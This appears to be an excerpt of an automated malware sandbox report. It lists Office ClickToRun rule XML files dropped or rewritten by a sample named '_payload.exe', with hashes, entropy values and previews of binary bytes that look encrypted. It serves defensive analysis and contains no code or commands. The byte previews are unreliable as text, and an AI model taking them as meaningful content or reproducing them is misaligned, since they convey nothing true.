                                                                                                                          Preview:.<?...'/l..?R..g."..7(7e..}.F&.y.o0*.A....*Z......i.%..Q.).D.s..O.....(Z.[.mY.x0.8..I#.`......m..U..S.R......i6..v...B?H......6'Y.MF..I.....p...n(d.8....u..e.aMQ....&....Eh..b..&.....s(.O..R...6....J.QOV.a......Oj.7...........(hp...5>S.!.i..d...l..H`x..Q....j...!....mg...#....A2..e.AT~..P.......7A%..&Y..=....x.a....P.;.K!Q..IHeE...&..t....;.&J..N...s.a.K..+...3.+j7..f.8..+.`:......}.........h.Dsv........NK...f...<.$.K.YVY.(.W@...5...........63..b].T\.'q..?...o..}....Wk..8&u./..3.....k.A,R..5.g..~.x.]P.*...o...+k...L.Ac>..lA...#F..Y...}.[........p...).~\..4C+..{f.18s.......f9..Yf.....8.......(]$.d.....7...kIr......A(.Bjw.!.k...~.D..@.fVw..idc"........A.K.....S.........8.t...= 9.+.8]%.}$.}"^.Vg/)....h."|...<.....6......IH..Cm.t.4m.....a).`w.II/..m.bv.g..VQ..a..._....aZ....J.....y.l"*.6.X....E...m..&N.5..7.....H..x.k..:...s4 ...}.....OnL....!....TKI{.X....3$D..G...Xa/...T8.}.E....6jx)y.%...W3../&...Py.....+..kZ.Xel...u..k*f."..DY..!..i9.A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703050v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1725
                                                                                                                          Entropy (8bit):7.888856490356895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NKLM+1DfP+JeUkCYVC1Ih2d55knOQOv+CkI31hk65snQ37hCkuYWiKwpmLP24aB1:NZ+h7+1Ihwtv+i5GQ37hCkulvTGrR9dD
                                                                                                                          MD5:3B41AEB9458BDF25974E8F1C40819115
                                                                                                                          SHA1:4B8D36221F1137AFD50249576C05A1B28344F2E3
                                                                                                                          SHA-256:FEEB0CEF300871F79ED57E97C1A6B28ED4F02D924CF0C9BB2041A34E9CAC7184
                                                                                                                          SHA-512:A36F95A35F8B67254AB17D4A6B466F9F8C22B1BEABE3B0770C114932E313D8E7F9658C322A64CF13021F2E96DED39AFEA064D6BFF0DDF8F6E94DA10BC7DDF004
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.i.A...<.&N.V.r..'.:.L...V....0.....I.%Nb..8t..).(......@$..g..d.tZ.uB$P..b..q.?)NW...uk..U.D.V....[...>.].W.c...g..c.......]....h..G....ovb..l7C'W.e;Q...4U...2D.U*.a/.(....s.......p...~..{%.|...b.QH.{...\.=.z.!..W.....Y_aD.*.a..1n.E......]..SOnS..X6.Z..$..A...>..W...xT........{.....T.L..."1CP.....?....K].^0.F...%.b..>A>.\.6...{........N....@.M.Y....!4..]..b.7.G......R5...H.B....*.&Dr$........L...=...>Q.'F.s".c.wRU....G8.L5..J..H.f.=.Q.-!.".......%*.#...W...{............U..`....=v...\g.ql.K.8.31..0..p.W.....UX.K.......b..>Y.l.4..\..Tn...tD...._.1ya.z...Qq..9..r.v.....y...N..h....,.G..:.V;Nu..+':...aF{..#P.\...k%0....+6..;^)...0.i..j..e5..O...F..C5.5i..(-.y.n.n.!..+.....b../8.1&.y_r.O.W..`..3..;......7...V>.#...*r.+... F.#..R.3.6g_{Ln..]z...X..M...G.-#.......>.@....4..V....l....G.....w. {<.~..*N.OG.S^....t+].Xf..Z....4.E.[..Yf?..{'.d....j1qj....0.U.vH...!..s,.~......V....t~.....o1...w.Ji..p$.Xvj)..@...Xg..T...^.%.Q>O....[...Y.Ok[-

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703051v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1762
                                                                                                                          Entropy (8bit):7.888179332243359
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:A6MMl2VL3LkqGj7y6v8o/efeCWRFqJL5fRmDKzxD:RMDVzLSO6UrWSJ7mDKz5
                                                                                                                          MD5:21284509E655D12C26B6FA6C6773E97A
                                                                                                                          SHA1:6150096504448DA972643374146915C047754927
                                                                                                                          SHA-256:F6211B258511719889FBB1577074D063180BFD2629F6EFD462200520B9ADAA1E
                                                                                                                          SHA-512:B38DE77FA5E7B34AFBEB09AF4FAC3E29A4941335AEB8E9A23383DCBD5FB50FCBA3023B4CE1677A43592DCF797E00048AB2ACDD77AC7BAD99C4C710FE7971AA0D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?....~.F.1..d..n.b......t......%C../:..#..+..T{.(..Z.`..1.>qkL.T...W....h..uH....x..q.M.....W.h....6.r...R..i..o....a.mSA. T... '..@m.Ho..;O.I../3..;..f..Qk>P....P.........gJnY....V.0.l.?...G.....O.E.........}..M...*..Y.p.{.6.(I....)Q..#y>......ah.q...}.}.:..".9".z.3.bp.....xH...b.egJ..A.G .O.7At.........nrW.k....07......O..;..].N}.."".>._$.......t.TL.......{n.w'}V..>1..d.....}4R.]........WV...a\h,..{..C..B.qE+MR.....O..&...4..:.].f...^i..Hi.........1@...l.....xc..c.......&...}..9...V.....zET++'.}...G\.?.._bJ.K.X....~.k.&.g....)..X...nw...:.g>eR...h.4..0/..I.....'.|e.....8\.......(..e...qD....I...c.H..f.....e..jb..{J.l+.VUE.s...F.C0...dwb.h.+...~..:.1R.!~#.}j*9......%....Y.]...6....3.....ih6..{.....l4bN..k..FVG'.*..d{......R.i....Oj..:H.0.Y.D....RU+..R.q_...."z..+z..}..6.V.q.;....s...YD7|.e....n.Y.V...`.K..F.&...D.m..).[.q.........\....Cv.G....2....h...(..LeM...FT..v.=L)#N.{F.F#.?.z....?..R.M]Dt{..f.W........I.3#...m.......x....}vM)

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703100v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1690
                                                                                                                          Entropy (8bit):7.881978534225567
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lXo22b/0kS8ZHu8gRnlGKud/Z2vzltZVbtWjTcXMRMCYD:lXo22bS1Gl/Ibltbt0KCE
                                                                                                                          MD5:9F84B3ED50CF7202AA7CC8ED88D34A47
                                                                                                                          SHA1:48A35B87E43F181DAC4602E489A2D6C7450DF1E7
                                                                                                                          SHA-256:A566931F07B3FFFDF61FBC6A9273D5E52ECCA1D04D640DB13028851597D6146F
                                                                                                                          SHA-512:E9AA935D98DE27CB04E77E04CB21B4F0C1993196634AF0FA105F3BB4479A907337C2CA0FBDE3006EE27865982374A21DD44716A41D43EA5F7DAD5311E9962897
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?%...Q.^_...I67j.\..8....H..=......[...@m\...3.R...'0QT....j..up... 3v.C.2.."...G..B2}..1.yq.p.vK.,.,....w&./xS.e.\..\...?......c.p}..`.#...._...!.......k...H)Q.p.u....GF.i..? ..._..$i)..w._......-..'..%....w.=.?..B#F#h2.".$.#...P...v.j.j..d.y.e.N.x..=.. .s.4.,A..C..%....m.1.W........r.^z.Q.l.j...^......Skz(...k.0..7.q.ex.2s....4 .......B....!.AWMw..lSlr..#`.a1.80n?r.B.!...J.`.!..6..c..T...wR2@...h.A.e._I...@...<L..k.4.q.-..b.....orm.7'(._.IV......O..p.{....D..7.....e.G....>.....h........%I....9..(q1.>.E>d........J...+>\.+.q....g.6d..n..vWE.h..y.....~..k......|.X[.lBH..t..JX..t.2"..wuK._.`e.X...D..-..$@0]jE.$....v].............MI....0F6.y..g..yo`m....g...&.|....\q.M%8.Wd.R..!........7..R|........^-...5.[R:....@}`..%<wg`xz..Na.....OT..2........(!.4 ....r..;T...]..i.'.}.[$.7.c;.1Zj.B{..r8.H.7..w.=....a..J..+P.\P.....k.f0.Us........m\e..V....o.R:s?%...Q.4..8.g.V.\.31..x.N....P..N..r...G...W.....U.pI.c3...vog.e.k......f.).T.$.o.....\.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703101v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1727
                                                                                                                          Entropy (8bit):7.883678249115961
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:yCtolX1bVxJZtjqU3GuJJ6dJyKkYhC6GBUJD8ZTiD:ysoll5x00QA1Ur
                                                                                                                          MD5:6CBCD7005AC9ACE523888F7C2E84CA4F
                                                                                                                          SHA1:4A2487CC61AFC64844949A6EBAB899BDC7B4FC95
                                                                                                                          SHA-256:8C4F194F84440CBB67553596D180B1264F8AEFCD02756BE06FB4619213435287
                                                                                                                          SHA-512:7AC511CF3A97145801903EA308C87E8985636D7B14EEAD24986420B9407AB9B111E1071BC86098AA49956F178A90988AD29BCEB84F86BA589DC4F0E968D57E1C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?na6Q.E.......1.NICf.d.k.^.P..Q.U}...{.1....l .r.t.i"..^.....`.&c._.&).....O/<&.q.=...h.].+V.5..).A.:pl...|..21.9....T.Q`?.tT&...@.o.`...7.........g.".~...:....:w.C^....9......BK.... .b........:..$#....y.bCX..@+p%..3R.R....#n._....E......+\,f.S.b....A....n./~P...L.h..R*{,.f#..1.1tz.....b.....(...+jk...P..h.W{.~7.].H.Qi.d.1n.iR.l'....1.........6......`...j.PB..Q....h.]n\..c..z..X...d..~#..KQ'.z$7e...`..`,....o...OG..e...I.".(...G...>.}su...<.QS:-.).dz,.n...h....N..k~O..6y........c. ..$..vr.W...y\.R...D.....E,.l.C..1[oN.F.F...8...^!2...4.s.....i..i(F..kZ.....8.z..y+..$p..m...ob...N'E.S.|N..])..w..~KG.L..1.0i.F>....'..e.Q/...SV.+OiXy..u....G.>r.e!d..Z.p....@=.=....3.2.Tk..R.e.:?....p.<... ...yQ.A.D.y~....~.(.!._=.<...k.......8%.?^4d............Y5-/.T.7...zYC\..Q.....s...}.o...l....Z(.0P.@`...h.h;.# ..b*.@...3x.!G.&...;...".."..Cz.E..9.4p........`...h....W...#*..*.......fh.........7...j._..............Q9.@..?..Qilq*y.R.....ge...6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1708
                                                                                                                          Entropy (8bit):7.885927518805346
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:SHv6z4q6fW0ki6Jsv1d87Lsd6GfgOMT8LJrD:SPa4ZfNkiSQXRfgyH
                                                                                                                          MD5:AB234E8AD84841F94E5DEF61A574B1EA
                                                                                                                          SHA1:989D0C8FE517934FD2273D04F833FE50FBECBEE4
                                                                                                                          SHA-256:561F10EF33C75AF1CA56E450F1503BB8B75C5F1A7DA1F46F753D640E9D7C5FE7
                                                                                                                          SHA-512:558D953D3747D1FDE511734B380E3B4CA76FD9306F06703225998AC8319FAEEA19D060DAAB61C9455114DD5532ABCAEADC5C8C23684CFEA70FDC9E77F94F6F7C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.{ri.".,W..k.%._.........v.....0f..d...@..R.t.q...Q........=..`...o.,pjE.....rd..X,.Y.+1M.A.....Y"..L\..r....F@.......K.J.U....<..;..8...........ws.V...A.B...Of(.-..pg...x$..Y..Dc.9l~...(....@w..;w.,.w.......C~.s...d.......-A.r9y.....~.....`.PJ.....?A.OU....Ac ........;86...:'......Zk=4r.u<....$....>.?.0.i.....D.-9.k.-...........R..F..Ov..............h.:J\j.l."....<M......2.....t!..].T.@?>."..Z...'....k.; t^G8w8...q...}..+....JH..PX.6V..]e/.a.......9...!......./...G.^#G".+2.x.8.G.....&:LvB..~a....lq..y3..../!9p.0....v.."...Zu.,A9:k.ph.....n...CJVp.$.6.(v."..}.^`z.....&..}.RM.7.?..4.@..#.=.@.{..m{..h.'.[K+9..j..A.9...q.`...B..(E.[..$\.9.....mO...Q...U!.HzLV..W!..H.....E...<Gi........i.....@(.#oa.U...H.<l....iD....:.d.T.wJ.z......;...R.....T...,R.5...;.ppf.3.Z..6r......a..U.>.zYh<..T......2..;.P*9ywW.P..bR.....5&jS..;.\...vUJ.....\^...+|...X.........of..w...XZ\/.N.pM..!......?)....,..C..j.J...{.8.r.vd?x.)K...*4|.r.;Ld.......%J..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703151v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1745
                                                                                                                          Entropy (8bit):7.8904189919252055
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lstLRaoHFADd6u8xlHvPDFrZWgcZZ8Uz9noOIzD:kLRaoHA6vHvLFV88+s
                                                                                                                          MD5:7A761E290B2ED6784F490CF89558D29D
                                                                                                                          SHA1:E8CE08F6D36636E9F0CAE482A55CA787DD3809E6
                                                                                                                          SHA-256:26FBC3D830D5D465D5ED51A66460C17A1C309CA324D67D7E7B20DBFB972428E3
                                                                                                                          SHA-512:FCC226AE937B750290FFC7C5EA7475C19C090058301052CFD8CE12165C3AC6F58EB524B519B62FA20F3014F93285873B99CDC1A4F1E5D5B310D92A945DE524E7
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?T.u..@..k.1...... .9AQ.Yp..A.He^.M?L`..y........n..Yq...w.fK...XM.(..vy..W..0.......X..}.-Z.O.].3........la....<^.%-..No..<..4b..^.Zv.....H.,...1.......a...$......v...). .s...%..*:.sK....K.W..n......0d.UL..h2 %..Ppb.8q..Ro.+.....vSuk..g_0.V.-..^...1.zV.gxk.k...X%..3+....1..s..~6:@.7...n.@...`v4OO..r..a...`P.%5..v...7.*P!t..W..f..Oyj...:l...G\f...+..........:.....L.-..F.)u%&G.7..G.o!.R....).F6X.....Re.o..D....US6ev.t1t.y.r.}.5...{,.r'.~.....Z.........rR...H>..q...U.Z...`h.Z.[.(?~pO.2..q;..^....2.VK.p...,...-.}..K.3.*.:a.......~2.X..V.#..=....ONbU.`.d....F..H]...}...!..'.Q...pOd^W&..<bF.wK.Z.^,R...$H.*!o.....<.S..g...E.......-......IU&......;.;T.>..j.n.|+..;T.<.@...p..gd.K....g.9.S..X.f.........m9..+..P)wy(._.fo.3.W..X.I..HB..h.s..R..<(.r.6..VY.$.d.#....*6.rk.%"!.?.......`...H.."..N..9.v:.!..'...pp.(W.j2...cL....o..f^PS..XK.nm@.%i....x*+.u.i...gJ[.I..C..........'..5l."I....w.60.d......9$.n'........(..W.G.1.U./b..?.Y......3m..;3.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703200v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.876500282927671
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:t/05d5zBmPuBjLutiQAau63XuKgetQOh9x6weCzVmy/Yc6Qe1gtD:t/od5zAu+i1aumuKEGEBCgMe2V
                                                                                                                          MD5:A5445FE862161F12F6205319DCB21891
                                                                                                                          SHA1:7B1268EAE27DD26A5DCD8FE646CBB028D931F149
                                                                                                                          SHA-256:5C121D47B34B9FEBE811042958335929C0C0241AD39E87427439F851DA1C8B2E
                                                                                                                          SHA-512:CEC9B126B0EA4B0F34F9732012CDC4BCABA2B5B415CC5F158D9B9DA2D02D34B219E8CD97572472D1E32E89AA31618F56D060F66050508A2FCB7AF3B14AD7FD16
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.(?"#...j..<.R.wAB.WI.{..a...S.i].$.C.R.m....pp=.~..b......_.....o...QM9...g6.....O..Dn2.......N.....FE.3\..x....R..J.'*...L...pK9...J..P.PRH.&........'.rp..m..Pu~....7.me.O.T.8..f..8............YkBq.;."J.j..#..J....&..-k....v..k.5^...g.Y.}..._Btn+N:....b.........~Q...7.B..6l}.1TZ....5. x{RC.y.+...h...{.....!LdY.Z.T7......BZ...g.......-..A:p......e..F.._.E...;..w....>g.j.7.+ti..V..!..tJ..:.n.....i..?...Bz.O[..a.R...A.Z......\..Y.{X.5...\M.....>....yU..Y...S.z...x.i..@...I....-.>........`......m1y......&.....4...q.p....V.t..$?.+W....5..uk.u.E..YK.@C.@...k0)U`........{..e..B.:+|...{P...p[..m./E.2 .a...Z.v.|R.n....G.Rj.W...d$.....Q6..#.s.T...=....T.O.d.......!....2q..[..3.........?...K[...-... .3....S..6.c........*....Y.(..._.n..*6.8.....{O...$.\..*$.N.....K..+h\i...<..=[..5|-.}!.F..t.-s..;D.]z.ZM&.d!..D.Ih..).|nu.*4;.J.c\q.>P..+..T.Ij>|1 S...[M..=.P.dF....j.6.{h.1..M..B.l;j...3.E.@0.Vrq...+...SJ.Z...a9..c.C...n.$.X@.\B..K.+..MH%".U8....E..QK

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703201v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.910358655523544
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:se+V+z3A3LhR402lizchB+JKksKlupRyOSnxAmGCXL7OA1htnO6OU/auZbD:seBk002c47+GKleOCX8X13O/U/a+D
                                                                                                                          MD5:19989B9E9426489CFDD3ADD58966DCC0
                                                                                                                          SHA1:A70B992B00DE3125425D94282D18465ED7BC96F2
                                                                                                                          SHA-256:C8E7FD8007968EF74DB17C5E3FEE2FE930E01AE82517E586DB97D3B1E3110B20
                                                                                                                          SHA-512:E5D5E48ADE59E974B3E4802FCA784785F3D68951D28547864AC0A4E09C236841F334671F4114D42D2E89C07944BA3087E632BD919753CEAD4A8428FFB4D241B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...fB.....e.......3]..l".C:Y....C.v..c..4.S.5..!...`.J........*(..w......>?.".W,.[........<....9.M-D)e..l...v~.c=...........s...5/....._...J...[.dSw..G.r.f..p.H.*....=..a.g......en.x.b.Bw...........'.k....-...)..M...r.q....*.m`.._.Um4...1.b....j...N.........-....c)7...Y.....}:.........+i:..?...."..1+38....& ..). h'+g.s.~."&.s.m.'.&\.{.~+..X9.(U..F....:#..A.....8b.....v...5...Q.K6.......'....:i`...@'q/.05........w.. ...f+2.o1.......N..H.g:.."..........2.m.P..}y.d4=Qz.}....R.n(.}c....m.W..K.e.6i...;.....K.X...7~...O...G].xx,.E....p...*U#..u..?|.$.....kw.x....uAY...R..7...a...u.dU./....S.J8.:.I.VVnX.}Xh..3.../...w.e:..n......*.......H?;..C...r:..PN..s.|....N.....rp...v......0..5.2......}{vS...V .....M...&....2......M"...K..Z.+0..g.(.v......6b._.4....]8.x+.lR..*...."v.8....|._.y..l......1x.%.c_...9_..O.D.O....hP.O..u...Z ...A.....u.W?.='...P..9.A@..B....@z........~fc,)..[.......FE.j..x@~.N.k...gF\0`...5{..J.u:..#P.!j$.%\[....kG...y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703250v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.87116530860433
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+yRkjisaPIZzusj0/gNN4T2TFWAf3X7NocaaD:nuji5PIZzHj04NGSWILNvay
                                                                                                                          MD5:D9933BF8774CF5019EDC0AF5187164DC
                                                                                                                          SHA1:2EA5A475713363FC2067B1A9F99EDD643C086ABF
                                                                                                                          SHA-256:C682475BD422E48A538BF8875A07FFF41A3B3029FE0904F56CC5B1148CFF47E3
                                                                                                                          SHA-512:6A05A13A29F61D748DE71459152EB3B1AE66EE3D52D0C81C79829616BCA38B58593EFAA5FA631297190742BF1A291EAD818979F2EAF8AAB2F58639538F99A9DD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.?u/.<.p{L.._{fSjym.......*..p82(g....S$(f......q.!....6...<...#.8.r1...q.l."T wO^"...7.D.*..z..^..Utn...s.{.P....M.F./..zJ..A..1..=.(.L6.4...u.........C<.o.w,....Uw.L...q..2.FoKF.....E..r.!...%.?[ 0sow..Z.qhD.t..Af..%...;...........B"..L....v*a).8%..O...+.....w...4sQq..4.J.p..ACc %.6..x.Dz....T......=j~2.p...^.e..#.q....R...Q.9..uu;.[....,G.g..7.5..~...8.@|DJ...... ....J<.WX.....:...2.y......I......v.:.5./.AX...6.(.R...}C..R.N............^.s..T.O).A]....4.a..._n..'p.|y.0..M.B...#...r....S^.;...y%.ol.]<..DF&.2.?..;,k..c=sup.9..l.l...-R..b~8.O."D.i...ax4/..V..........(v.Y....b....K...;.....c....#O..l8..H.j....^i..T..:o..l.@.op.N.5.q..:..\T..2y4.|...../#...y......~.....[.k..nr.."..'.N..x.l...]8.M.......^.?...XUT...\.o..'.tTR 9.........{.W..@g.......HF_F...y+.Zz...+..+Oi.LZ.[.6..V'~.......0.....Rf...R...z.$[!2.n.....D.+.?....U...l.vmX.B.(..P.....r.M......5...w.....1.U.~..)l.@...czJW..:.(-p...2.K]"..xe./..b;....9..9.K.d.a8...e..F..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703251v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1731
                                                                                                                          Entropy (8bit):7.873746471219262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+ta135AgFV2k3qE74JCuxyu3B3JNeVuUIDKm0MuAmfU/UoWiEOlIAqZAYgQ91PD9:BJAg/2LE7bCyINeyUMF8dXZA61PpHD
                                                                                                                          MD5:B3B2D9F14234F8F55A0856B8D282694F
                                                                                                                          SHA1:F49387750EB118BA9B141E940D3220E09D91264C
                                                                                                                          SHA-256:A58AF10CA4E5DD94620F09A9467866035DD20EA3208436F98264DC20DB394313
                                                                                                                          SHA-512:3E9F5775B2345D406931F8815ED7A48C29048A0BB323BD64ACC44A5596262690D5C35C9373B81DD6ECDB29A5BFE9660247237664C326160845C27994AF01F1E0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?c6F....1...}.[.|.$.M2.....9...J=.....1^E..j.........C.....'..V..%.M..*..c.F..0q.qD.)j.f.......W..nTYA...p.5fo..9Hb.....~...B56..s...Gj..6.R..jB....}...n........{}}.<9T%R...{O....{..*S}...t.P..J...5m]....q.*J.R..$/...t.).}#2..rbT..#.~.....Sq.h.._o..Y.?....%#n.3......._.V).Q..>._#(.|.(..B....#.N.D.W"$..V......-.........3'.*.).......7.,.....a........%..$.a.Bn..W."...:....H.w.>.r...%...'........G.!......pQ....X.=.d...j.....A.&?.5-ULna.o...1..b..i.m...5.....h#1u.t...a.c8...lt...@>..B5.k..c.*..Ow..;...;.P..........A70.. wn|.~..!.7Gj.HR{.Y......P/..?%....6#.Z.<......W...No...@zEA,.\,ae.z..yw..`v.....:1W./....<.......{.:.7..........Ye.....*.q.;Oh...\-,..}.V3..J....CE*&..W...0.Z ...z......."li.....:.kCM.-.,..F..P...e\.zT.3...nR...[.......I...J...u4*....'.q.E..y.[...=.....AH[.HL&.z .p..D~...t..'....o....X..D.5.......y2/qFoM.....t..5...'..R.....S.zg.UY..QX.l8..qO..G%M.+..M.n.._.#.B...)r..-tBRO8.K..a]...S...C...Y.G.'..:.$.mR....g_$..$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703300v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.898941573445208
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wghsCSouGEHMY42Lc5VfviVt35Zs3qkoWND:wgTSNvFkEFs3qkB1
                                                                                                                          MD5:EC34EE60FE8F4120B6484D79510680C9
                                                                                                                          SHA1:C1D296AB244DE8C0EBA765D44C0CDA0746C78643
                                                                                                                          SHA-256:69DD0D1D1528CC4991D8A42D4D7584E650DE5126D8050CA4B2577DA5C9225594
                                                                                                                          SHA-512:16A392557CE2FE64FA1F5BF17DA2B60FFC7C30D832A6417882B2D2AB2547FB69FE62EF1B6910E4DADF005072868A8B6B89684758B23183F93B17F159E65895F8
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?......1...0sZ.9....9:..+....s.[...).,|......C-....g.<....j...K..a.$...3 .@S...)Z.....%..#....?...T.`..P.h.n..i.p..i........l..N....X.}. _i.]...+R.f{(q.....`...._..M.1..r).....P].nl.uq..?....Y...l.....t.y..\..e.dq..0..R..lr......h.k.L.....7*~=..q+1).1.i9/......|....W......[]Av...'...@..x......(.VC..O.MBD..J...Y*.{.cN.'.....LU..".]....X.SJ..0....j.\..2.w.B.. .jZ...R|D..t..$..5.......n...W.B7...q_C.k.2..y~A.HC...6..|...v..d.]..o..'..>e...u*...H.sA.6.5.G...V..._.m..../>h...#.....p..Z.+.L.C..s..=p+..ov...S..uea.V....b8....X...:]{[...}.n.B.n..0..+..p.K...I..CF...%...2@]{R....n..P...G..A.v.o...b..........D%k..y..t.........p` /..v..*..].....N:...5...U..Ov.Z.L.G.vluS.~s.h.fV.1...Z..r..].Ah.1.....@.(.h@w....+...........%.S.^|.....^a.E.....1.Q.FL.K2.o.&...64.'......a.._.BVO...P?..s$....&....e....*X....x....+h.5.N..Lwt.M%&......0T....>2....)......A*...m??=%_.y...zU.r.+..:.......U...V..c....}.x2UM.sem....q...%.*..?.[C...&.A.t..Eyof$.yb6.a.f..,

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703301v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1753
                                                                                                                          Entropy (8bit):7.891206770365407
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FiX+9LZcr7Rk3rJsIgobD4AR/Pt9Vld0vFbL+rl3ctLD:F8iZsk3GTWF/Ppk+rAn
                                                                                                                          MD5:C9A4709B4CB65956B19FA851CD3FD3D9
                                                                                                                          SHA1:F944B62BDEC553060601462B9B1C368B52FCA62B
                                                                                                                          SHA-256:8B0779361391863DCA55B523CCE97CB774B75DD8DC7C42C624BCFAC903CC2A83
                                                                                                                          SHA-512:84A33C453E0EC21818BEAA00D6580CC8B21A21DD931F26BC35CDB29E6A764F48292DA5D17B72C50AE0B69B34C484957F525E90DB1590FAFA03C4C7B628A5C890
                                                                                                                          Malicious:false
